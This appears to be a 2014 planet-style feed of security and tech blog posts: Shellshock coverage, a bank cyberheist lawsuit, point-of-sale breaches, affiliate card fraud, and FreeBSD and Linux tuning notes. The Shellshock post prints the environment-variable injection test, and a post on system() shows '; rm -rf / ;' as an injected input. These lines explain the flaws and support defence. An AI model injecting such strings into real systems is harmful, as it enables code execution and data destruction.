The vulnerability does not impact Microsoft Windows users, but there are patches available for Linux and Unix systems. In addition, Mac users are likely vulnerable, although there is no official patch for this flaw from Apple yet. I’ll update this post if we see any patches from Apple.

Update, Sept. 29 9:06 p.m. ET: Apple has released an update for this bug, available for OS X Mavericks, Mountain Lion, and Lion.

The U.S.-CERT’s advisory includes a simple command line script that Mac users can run to test for the vulnerability. To check your system from a command line, type or cut and paste this text:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the system is vulnerable, the output will be:

 this is a test

An unaffected (or patched) system will output:

 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test

US-CERT has a list of operating systems that are vulnerable. Red Hat and several other Linux distributions have released fixes for the bug, but according to US-CERT the patch has an issue that prevents it from fully addressing the problem.

The Shellshock bug is being compared to Heartbleed because it affects so many systems; determining which are vulnerable and developing and deploying fixes to them is likely to take time. However, unlike Heartbleed, which only allows attackers to read sensitive information from vulnerable Web servers, Shellshock potentially lets attackers take control over exposed systems.

“This is going to be one that’s with us for a long time, because it’s going to be in a lot of embedded systems that won’t get updated for a long time,” said Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley. “The target computer has to be accessible, but there are a lot of ways that this turns accessibility into full local code execution. For example, one could easily write a scanner that would basically scan every Web site on the planet for vulnerable (Web) pages.”

Stay tuned. This one could get interesting very soon.

Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and is now making everybody go insane. But around this there's more buzz than actual fire. The problem, I think, is that a number of claims around this vulnerability are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS, which tried to calm down the situation as well.

Yes, the bug is nasty, and yes, the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have defaulted to dash as their system shell for years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it's obvious: you pass down the CGI variables with the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.

Using system() is already a red flag for me in lots of server-side software: input sanitization is essential there, as otherwise passing user-provided strings to a system() call makes it trivial to achieve remote code execution. Think of software using system("convert %s %s-thumb.png") with a user-provided string, and let the user provide ; rm -rf / ; as their input… can you see the problem? But with this particular bash bug, you don't need user-supplied strings to be passed to system(): the mere call causes the environment to be copied over, and thus the code to be executed. This relies on /bin/sh being bash, which is not the case for the BSDs, Debian, Ubuntu and a bunch of other setups. It also requires the attacker to be able to set an environment variable.
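To make the classic system() injection concrete, here is a deliberately harmless sketch of the convert example above: echo stands in for convert so nothing needs to be installed, and the payload merely prints a marker instead of deleting anything (the variable name `user_input` and the filenames are made up for the demo):

```shell
# Attacker-controlled "filename"; the semicolon ends the intended
# command and starts a new one, exactly as /bin/sh -c parses it.
user_input='photo.png; echo INJECTED'

# This is roughly what system("convert %s %s-thumb.png") boils down
# to once the string is interpolated; "INJECTED" appearing in the
# output shows the attacker's command ran.
/bin/sh -c "echo convert ${user_input} ${user_input}-thumb.png"
```

Note this is the ordinary injection problem that sanitization can prevent; the point of Shellshock is that it bypasses sanitization entirely, since the payload travels in the environment rather than in the command string.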

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This is the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages, that script uses #!/bin/bash explicitly, making those systems vulnerable even if their default shell is not bash.
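The distinction is easy to verify: the shebang line, not the system's default /bin/sh, decides which interpreter runs a script. A small demonstration (the path /tmp/helper-demo.sh and the script's content are invented for this sketch, standing in for something like dhclient-script):

```shell
# Write a helper that explicitly requests bash, the way Debian's
# dhclient-script does.
cat > /tmp/helper-demo.sh <<'EOF'
#!/bin/bash
echo "running under: $BASH_VERSION"
EOF
chmod +x /tmp/helper-demo.sh

# Even on a system where /bin/sh is dash, this prints a bash version:
# every invocation of the helper goes through bash's parser, crafted
# environment and all.
/tmp/helper-demo.sh
```

So auditing for exposure means grepping for bash shebangs in anything reachable from network-facing code, not just checking what /bin/sh points to.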

But who seriously uses CGI in production nowadays? It turns out that a bunch of people using WordPress do, to run PHP — and I'm sure there are scripts using system(). If this is a nail in the coffin of something, my opinion is that it should be the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is CGI running on small devices: routers, TVs, and so on. It is indeed the case that the majority of those devices implement their web interfaces through CGI, because it's simple and proven, and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of people wouldn't go near bash with a ten-foot pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably already have busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable" and "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true; as SANS points out, only a minimal share of devices is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again about "project health", talking a bit more about bash as a project. In the mean time, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out, the first fix was not thought out properly), and make sure you don't self-host the stuff you want to keep out of the cloud on a server you upgrade once a year.

BASH shell bug Official PC-BSD Blog | 2014-09-25 19:33 UTC

As many of you are probably aware, there is a serious security issue that is currently all over the web regarding the GNU BASH shell.  We at the PC-BSD project are well aware of the issue, a fix is already in place to plug this security hole, and packages with this fix are currently building. Look for an update to your BASH shell within the next 24 hours in the form of a package update.

As a side note: nothing written by the PC-BSD project uses BASH in any way, and BASH is not built into the FreeBSD operating system itself (it is an optional port/package), so the severity of this bug is lower on FreeBSD than on other operating systems.

On the FreeBSD mailing list, Bryan Drewery has already sent a notice that the port is fixed in FreeBSD. Since he also added some good recommendations for BASH users in that email, we decided to copy it here for anyone else who is interested.

From: Bryan Drewery — FreeBSD mailing list

The port is fixed with all known public exploits. The package is
building currently.

However bash still allows the crazy exporting of functions and may still
have other parser bugs. I would recommend for the immediate future not
using bash for forced ssh commands as well as these guidelines:

1. Do not ever link /bin/sh to bash. This is why it is such a big
problem on Linux, as system(3) will run bash by default from CGI.
2. Web/CGI users should have shell of /sbin/nologin.
3. Don’t write CGI in shell script / Stop using CGI
4. httpd/CGId should never run as root, nor “apache”. Sandbox each
application into its own user.
5. Custom restrictive shells, like scponly, should not be written in bash.
6. SSH authorized_keys/sshd_config forced commands should also not be
written in bash.

For more information on the bug itself, you can visit arstechnica and read the article by clicking the link below.

Conferencing Flameeyes's Weblog | 2014-09-25 18:57 UTC

This past weekend I had the honor of hosting VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I have organized a conference (or rather helped organize one; Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and do better the next time I try something like this.

Photo credit: me
Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, thanks to the fact that Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong, as he had to get an (easy) visa on entry.

Getting just shy of a hundred people into a city like Dublin, which is by no means a metropolis like Paris or London, is an interesting exercise: yes, we had the space for the conference itself, but finding hotels and restaurants for that many people became tricky. A very positive shout-out is due to Yamamori Sushi, which hosted all of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration — knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful when their attitude can be a bit grating online. And given that many people, including me, are known as proponents of Troll-Driven Development – or Rant-Driven Development, given that Anons, redditors and 4channers have given an even worse connotation to "troll" – it's really a requirement if you are genuinely interested in being part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie and to leave them to people who would actually use them, although I did pick up a Gandi VLC shirt. I hope I'll manage the same at LISA, as I'm bound there too; last year I came back with way too many shirts and other swag.

A Texas bank that’s suing a customer to recover $1.66 million spirited out of the country in a 2012 cyberheist says it now believes the missing funds are still here in the United States — in a bank account that’s been frozen by the federal government as part of an FBI cybercrime investigation.

In late June 2012, unknown hackers broke into the computer systems of Luna & Luna, LLP, a real estate escrow firm based in Garland, Texas. Unbeknownst to Luna, hackers had stolen the username and password that the company used to manage its account at Texas Brand Bank (TBB), a financial institution also based in Garland.

Between June 21, 2012 and July 2, 2012, fraudsters stole approximately $1.75 million in three separate wire transfers. Two of those transfers went to an account at the Industrial and Commercial Bank of China. That account was tied to the Jixi City Tianfeng Trade Limited Company in China. The third wire, in the amount of $89,651, was sent to a company in the United States, and was recovered by the bank.

Jixi is in the Heilongjiang province of China on the border with Russia, a region apparently replete with companies willing to accept huge international wire transfers without asking too many questions. A year before this cyberheist took place, the FBI issued a warning that cyberthieves operating out of the region had been the recipients of approximately $20 million in the year prior — all funds stolen from small to mid-sized businesses through a series of fraudulent wire transfers sent to Chinese economic and trade companies (PDF) on the border with Russia.

Luna became aware of the fraudulent transfers on July 2, 2012, when the bank notified the company that it was about to overdraw its accounts. The theft put Luna & Luna in a tough spot: The money the thieves stole was being held in escrow for the U.S. Department of Housing and Urban Development (HUD). In essence, the crooks had robbed Uncle Sam, and this was exactly the argument that Luna used to talk its bank into replacing the missing funds as quickly as possible.

“Luna argued that unless TBB restored the funds, Luna and HUD would be severely damaged with consequences to TBB far greater than the sum of the swindled funds,” TBB wrote in its original complaint (PDF). TBB notes that it agreed to reimburse the stolen funds, but that it also reserved its right to legal claims against Luna to recover the money.

When TBB later demanded repayment, Luna refused. The bank filed suit on July 1, 2013, in state court, suing to recover the approximately $1.66 million that it could not claw back, plus interest and attorney’s fees.

For the ensuing year, TBB and Luna wrangled in the courts over the venue of the trial. Luna also counterclaimed that the bank’s security was deficient because it only relied on a username and password, and that TBB should have flagged the wires to China as highly unusual.

TBB notes that per a written agreement with the bank, Luna had instructed the bank to process more than a thousand wire transfers from its accounts to third-party accounts. Further, the bank pointed out that Luna had been offered but refused “dual controls,” a security measure that requires two employees to sign off on all wire transfers before the money is allowed to be sent.

In August, Luna alerted (PDF) the U.S. District Court for the Northern District of Texas that in direct conversations with the FBI, an agent involved in the investigation disclosed that the $1.66 million in stolen funds were actually sitting in an account at JPMorgan Chase, which was the receiving bank for the fraudulent wires. Both Luna and TBB have asked the government to consider relinquishing the funds to help settle the lawsuit.

The FBI did not return calls seeking comment. The Office of the U.S. attorney for the Northern District of Texas, which is in the process of investigating potential criminal claims related to the fraudulent transfers, declined to comment except to say that the case is ongoing and that no criminal charges have been filed to date.

As usual, this cyberheist resulted from missteps by both the bank and the customer. Dual controls are a helpful — but not always sufficient — security control that Luna should have adopted, particularly given how often these cyberheists are perpetrated against title and escrow firms. But it is galling that it is easier to find more robust, customer-facing security controls at your average email or other cloud service provider than it is at one of thousands of financial institutions in the United States.

If you run a small business and are managing your accounts online, you’d be wise to expect a similar attack on your own accounts and prepare accordingly. That means taking your business to a bank that offers more than just usernames, passwords and tokens for security. Shop around for a bank that lets you secure your transfers with some sort of additional authentication step required from a mobile device. These security methods can be defeated of course, but they present an extra hurdle for the bad guys, who probably are more likely to go after the lower-hanging fruit at thousands of other financial institutions that don’t offer more modern security approaches.

But if you’re expecting your bank to protect your assets should you or one of your employees fall victim to a malware phishing scheme, you could be in for a rude awakening. Keep a close eye on your books, require that more than one employee sign off on all large transfers, and consider adopting some of these: Online Banking Best Practices for Businesses.

Almost an entire year ago (just a few days apart), I announced my first published book, SELinux System Administration. The book covered SELinux administration commands and focused on Linux administrators who need to interact with SELinux-enabled systems.

An important part of SELinux was covered only briefly in that book: policy development. So this spring, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and tuning SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and is even the reference platform), even though the book is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat of a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book's development contributed well to the final result (something I overlooked a bit the first time, so this time I re-re-reviewed changes over and over again – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.

More than seven weeks after this publication broke the news of a possible credit card breach at nationwide sandwich chain Jimmy John’s, the company now confirms that a break-in at one of its payment vendors jeopardized customer credit and debit card information at 216 stores.

On July 31, KrebsOnSecurity reported that multiple banks were seeing a pattern of fraud on cards that were all recently used at Jimmy John’s locations around the country. That story noted that the company was working with authorities on an investigation, and that multiple Jimmy John’s stores contacted by this author said they ran point-of-sale systems made by Newtown, Pa.-based Signature Systems.

In a statement issued today, Champaign, Ill.-based Jimmy John’s said customers’ credit and debit card data was compromised after an intruder stole login credentials from the company’s point-of-sale vendor and used these credentials to remotely access the point-of-sale systems at some corporate and franchised locations between June 16, 2014 and Sept. 5, 2014.

“Approximately 216 stores appear to have been affected by this event,” Jimmy John’s said in the statement. “Cards impacted by this event appear to be those swiped at the stores, and did not include those cards entered manually or online. The credit and debit card information at issue may include the card number and in some cases the cardholder’s name, verification code, and/or the card’s expiration date. Information entered online, such as customer address, email, and password, remains secure.”

The company has posted a listing on its Web site of the restaurant locations affected by the intrusion. There are more than 1,900 franchised Jimmy John’s locations across the United States, meaning this breach impacted roughly 11 percent of all stores.

The statement from Jimmy John’s doesn’t name the point of sale vendor, but company officials confirm that the point-of-sale vendor that was compromised was indeed Signature Systems. Officials from Signature Systems could not be immediately reached for comment, and it remains unclear if other companies that use its point-of-sale solutions may have been similarly impacted.

Point-of-sale vendors remain an attractive target for cyber thieves, perhaps because so many of these vendors enable remote administration on their hardware and yet secure those systems with little more than a username and password — and often easy-to-guess credentials to boot.

Last week, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.

Mehr als 15 Cent (More than 15 cents) Hanno's blog | 2014-09-22 14:48 UTC

For months we have been able to read new horror stories about the spread of Ebola almost daily. I don't think I need to repeat them here.

For many of us, me included, Ebola is far away, and not only in the spatial sense. I have never seen an Ebola patient, and I know almost nothing about the affected countries such as Sierra Leone, Liberia or Guinea. Many people probably feel the same way; I, too, only noticed many of the reports in passing. But one thing I did take away: the problem is not that we don't know how to stop Ebola. The problem is that it isn't being done, that those who want to help, often at the risk of their own lives, are not being given sufficient means.

One number I read in the last few days has stuck with me: the German federal government has so far made 12 million euros available for Ebola relief. That works out to roughly 15 cents per inhabitant. I lack the words to describe that adequately; it is somewhere between embarrassing, irresponsible and scandalous. Germany is one of the wealthiest countries in the world. I will spare you comparisons with bank bailouts or underground train stations.

Yesterday I donated an amount to Ärzte ohne Grenzen (Doctors Without Borders). As far as I can tell, Doctors Without Borders is currently the most important organization trying to help on the ground, and everything I know about them gives me the feeling that my money is in good hands there. It was an amount several orders of magnitude higher than 15 cents, but also one that, given my financial means, doesn't hurt me.

I don't actually think this is right. I think it should go without saying that the world community helps in an emergency like this. Whether a deadly disease gets fought should not depend on donations; I would actually like my tax money to pay for such things. But the reality is: right now, that is not happening.

I am not writing this to emphasize how great I am. I am writing it because I want to ask you, the person reading this, to do the same. I believe everyone reading this is able to donate more than 15 cents. Donate an amount that seems affordable and appropriate given your financial situation. Right now. It only takes a few minutes:

Donate online to Ärzte ohne Grenzen

(I would be happy if this post gets spread / shared, for example with the hashtag #mehrals15cent)

Hardly a week goes by when I don’t hear from a reader wondering about the origins of a bogus credit card charge for $49.95 or some similar amount for a product they never ordered. As this post will explain, such charges appear to be the result of crooks trying to game various online affiliate programs by using stolen credit cards.

Bogus $49.95 charges for herbal weight loss products like these are showing up on countless consumer credit statements.
Most of these charges are associated with companies marketing products of dubious value and quality, typically by knitting a complex web of front companies, customer support centers and card processing networks. Whether we’re talking about a $49.95 payment for a bottle of overpriced vitamins, $12.96 for some no-name software title, or $9.84 for a dodgy Internet marketing program, the unauthorized charge usually is for a good or service that is intended to be marketed by an online affiliate program.

Affiliate programs are marketing machines built to sell a huge variety of products or services that are often of questionable quality and unknown provenance. Very often, affiliate programs are promoted using spam, and the stuff pimped by them includes generic prescription drugs, vitamins and “nutriceuticals,” and knockoff designer purses, watches, handbags, shoes and sports jerseys.

At the core of the affiliate program is a partnership of convenience: The affiliate managers handle the boring backoffice stuff, including the customer service, product procurement (suppliers) and order fulfillment (shipping). The sole job of the “affiliates” — the commission-based freelance marketers who sign up to promote whatever is being sold by the affiliate program — is to drive traffic and sales to the program.


It is no surprise, then, that online affiliate programs like these often are overrun with scammers, spammers and others easily snagged by the lure of get-rich-quick schemes. In June, I began hearing from dozens of readers about unauthorized charges on their credit card statements for $49.95. The charges all showed up alongside various toll-free 888- numbers or names of customer support Web sites, such as supportacr[dot]com and acrsupport[dot]com. Readers who called these numbers or took advantage of the chat interfaces at these support sites were all told they’d ordered some kind of fat-burning pill or vitamin from some random site, such as greenteahealthdiet[dot]com or naturalfatburngarcinia[dot]com.

Those sites were among tens of thousands that are being promoted via spam, according to Gary Warner, chief technologist at Malcovery, an email security firm. The Web site names themselves are not included in the spam; rather, the spammers include a clickable URL for a hacked Web site that, when visited, redirects the user to the pill shop’s page. This redirection is done to avoid having the pill shop pages indexed by anti-spam filters and other types of blacklists used by security firms, Warner said.

The spam advertising these pill sites is not typical junk email blasted by botnet-infected home PCs, but rather is mostly “Webspam” sent via hacked Webmail accounts, said Damon McCoy, an assistant professor of computer science at George Mason University.

“Herbal spam from compromised Webmail accounts is a huge problem,” said McCoy, who has co-authored numerous studies on dodgy affiliate programs.

A support Web site named after the same number that appears on the “customer’s” credit card statement.
Several sources at financial institutions that have been helping customers battle these charges say most of those customers at one point in the past used their credit cards to donate to one of several religious, political activist, and social service organizations online. I may at some point post another story about this aspect of the fraud if I can firm it up any more.

McCoy believes that most of the fraudulent charges associated with these affiliate program Web sites are the result of rogue affiliates who are merely abusing the affiliate program to “cash out” credit card numbers stolen in data breaches or purchased from underground stores that sell stolen card data.

“My guess is these are ‘legit’ herbal affiliate programs that are getting burned by bad affiliates,” McCoy said.

Affiliate fraud was a major problem for the two captains of competing pharmacy spam affiliate programs who are profiled in my upcoming book, Spam Nation. Most of the affiliate programs featured in my book dealt with the problem of scammers trying to use stolen cards to generate phony sales by placing two-week “holds” or “holdbacks” on all affiliate commissions: That way, if an affiliate’s “purchases” generated too many chargebacks, the affiliate program could terminate the affiliate and avoid paying commissions on the fraudulent charges.

But McCoy said it’s likely that this herbal affiliate program is not employing holdbacks, at least not in any timeframe that could deter rogue affiliates from running stolen cards through the system.

“If this affiliate program doesn’t have a holdback, they are a great target for this type of fraud,” McCoy said.

As if in recognition of this problem, the herbal pill Web sites ultimately promoted in these Webspam attacks are tied to a sprawling network of thousands of similar sites, all of which come with their own dedicated customer support Web site and phone number (866- and 888- numbers). Those same support phone numbers are listed next to the fraudulent charges on customers’ monthly credit card statements. In virtually all cases, the organization names listed on these support Web sites are legally registered, incorporated companies based in Florida.

All of the banks I spoke with in researching this story said customers told them that the support staff answering the phones at the 888- and 866- numbers tied to the herbal pill sites were more than happy to reverse the fraudulent charges. The last thing these affiliate programs want is a bunch of chargebacks: Too many chargebacks can cause the merchant to lose access to Visa and MasterCard’s processing networks, and can bring steep fines.

Not that legitimate customers of these dodgy vitamin shops are in for the best customer service experience either.  Very often, ordering from one of these affiliate marketing programs invites even more trouble. A note appended in fine print to the bottom of the checkout page on all of the herbal pill sites advises: “As part of your subscription, you will automatically receive additional bottles every 3 Months. Your credit card used in this initial order will be used for future automatic orders, and will be charged $148.00 (Includes S/H).”

If you see charges like these or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card on the off chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to be abused like this again.

Daemonische Webschleuder My Universe | 2014-09-21 19:15 UTC

Apache and Nginx are (at least according to Netcraft) among the most widely used web servers. If you run one of these two and use FreeBSD as the foundation, you can give both a serious speed boost, and lower the system load along the way. No black magic is required, just a kernel module[1] called accf_http. It is by no means new, by the way; it was introduced back in FreeBSD 4.0 and has thus been around for a good 14 years.

Behind that name is a module from the accept_filter family, tailored specifically to the HTTP protocol. It makes FreeBSD's network stack receive the complete HTTP request before the socket signals to the application that an incoming connection has arrived. The logic for parsing incomplete HTTP requests can thus safely be switched off, since the web server can rely on a complete request being present.

Another side effect: incomplete requests no longer block a web server process or thread, which is why the Apache web server in particular benefits from the HTTP accept filter. Nginx works with non-blocking sockets and, unlike most Apache MPMs, does not reserve an extra thread or process per incoming connection, so incomplete requests do not drive Nginx to spawn additional processes or threads. However, Nginx still has to keep checking all accepted connections to find out on which of them a complete request has finally arrived.

By design, the resource savings for Nginx are therefore not as large as for Apache. But because only complete requests end up in the connection queue, request processing is sped up significantly, which matters most when answering the request itself takes hardly any compute time (for example because it is served from a cache). An elaborate dynamic web application benefits less here, since most of the total response time is spent computing the answer, not receiving the request.

So how do you get to enjoy this functionality? Apache users merely have to make sure the kernel module is loaded before the server starts, for example by adding it to /boot/loader.conf:
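The actual loader.conf line is missing from the post; assuming the stock loader variable for this module (as documented in accf_http(9)), the entry would be:

```
# /boot/loader.conf -- load the HTTP accept filter at boot
accf_http_load="YES"
```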

Once the module is available (or has been compiled into the kernel), Apache uses the accept filter without further ado. If it is not available, Apache even complains outright with a warning:

[warn] No such file or directory: Failed to enable the 'httpready' Accept Filter

Nginx, on the other hand, needs a little encouragement to use the accept filter:

server {
    listen 80 accept_filter=httpready;
}
To be fair, it must be said that this alone will not do the trick. To not merely save resources but actually gain performance, there is no way around looking into the other tuning options as well, and determining settings that match the web server's actual workload. Keywords here are the sysctl variables kern.ipc.soacceptqueue, kern.ipc.maxsockbuf, net.inet.tcp.sendspace and net.inet.tcp.recvspace. More extensive information on these is offered, for example, by the Network Tuning Guide at
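As a hedged starting point, those sysctls could be set like this in /etc/sysctl.conf (the values below are illustrative placeholders, not recommendations from the original post; measure against your own workload):

```
# /etc/sysctl.conf -- illustrative values only, tune per workload
kern.ipc.soacceptqueue=1024      # listen backlog queue length
kern.ipc.maxsockbuf=2097152      # maximum socket buffer size in bytes
net.inet.tcp.sendspace=65536     # default TCP send buffer
net.inet.tcp.recvspace=65536     # default TCP receive buffer
```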

1. Alternatively, the filter can be compiled statically into the kernel with options ACCEPT_FILTER_HTTP

Outreach Program for Women Luca Barbato | 2014-09-21 13:49 UTC

Libav participated in the summer edition of the OPW. We had three interns: Alexandra, Katerina and Nidhi.


The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start from a simple task, and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care, and hidden bugs usually get uncovered that way.

Not so small tasks

Katerina decided to do something radical from the start: she tried to use Coccinelle to fix a whole class of issues in a single sweep. I’m still reviewing the patch and splitting it into smaller chunks to single out false positives. The patch itself shone a spotlight on some of the most horrible code still lingering around; hopefully we’ll get to fix those parts soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks, they honed their skills by reimplementing the ASF and RealMedia demuxer respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love: plenty of overly long files, lots of small quirks that should be ironed out. Libav (like any other big project) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and helping others do the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and making it work at least as well as the former), but both kinds of tasks are fundamental to keeping the project healthy!

In closing

All the projects have been a success, and we are looking forward to seeing further contributions from our new members!

bcache Patrick's playground | 2014-09-21 11:59 UTC

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that has become the new rootfs initially.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive I copied all data away, reformatted the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The raid5 stays as it is, but gets reformatted with bcache.
In code:
wipefs -a /dev/md0 # remove old headers to unconfuse bcache (-a actually erases them)
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsiveness while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe 2/3rds of the SSD natively, but I have 1TB storage with that speed now - for a $25 update that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms

Definitely awesome!

The second BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

I started digging deeper into the RSS performance on my home test platform. Four cores and one (desktop) socket isn't all that much, but it's a good starting point for this.

It turns out that there was some lock contention inside netisr. Which made no sense, as RSS should be keeping all the flows local to each CPU.

After a bunch of digging, I discovered that the NIC was occasionally receiving packets into the wrong ring. Have a look at this:

Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff80047713d00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742e100; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c2e00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c5000; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742ec00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff8004727a700; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f11600; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80047279b00; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f0b700; flowid=0x335a5c03; rxr->me=2

The RX flowid was correct - I hashed the packets in software too and verified the software hash equaled the hardware hash. But they were turning up on the wrong receive queue. "rxr->me" is the queue id; the hardware should be hashing on the last 7 bits. 0x3 -> ring 3, 0x2 -> ring 2.
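As a small sanity check, the mismatch in the quoted dmesg output can be reproduced in a few lines (assuming, as the post does, that with four rings the expected ring is simply the low bits of the RSS flowid; this script is illustrative and was not part of the original debugging):

```python
# Expected ring = low 2 bits of the flowid (4 receive rings); the dmesg
# lines above show each flow landing on the *other* ring instead.
observed = {0x21f7db62: 3, 0x335a5c03: 2}

for flowid, seen in observed.items():
    expected = flowid & 0x3
    print(f"flowid={flowid:#x}: expected ring {expected}, observed ring {seen}")
```

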